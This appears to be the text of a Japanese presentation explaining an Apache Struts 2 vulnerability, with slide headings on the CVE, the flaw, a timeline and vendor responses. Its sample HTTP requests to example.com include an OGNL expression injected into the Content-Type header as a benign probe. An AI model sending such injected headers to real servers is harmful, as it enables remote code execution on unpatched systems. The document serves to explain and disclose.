POST /login.jsp HTTP/1.1
Host: www.example.com
Content-Type: multipart/form-data
... フォームデータ
Content-Type: %{(#test='multipart/form-data').(new java.lang.Integer(42))}
Apache Struts 2 って何?
CVE って?
どういう脆弱性?
POST /login.jsp HTTP/1.1
Host: www.example.com
Content-Type: multipart/form-data
... フォームデータ
POST /login.jsp HTTP/1.1
Host: www.example.com
Content-Type: %{(#test='multipart/form-data').(new java.lang.Integer(42))}
... フォームデータ
時系列
各社の対応とか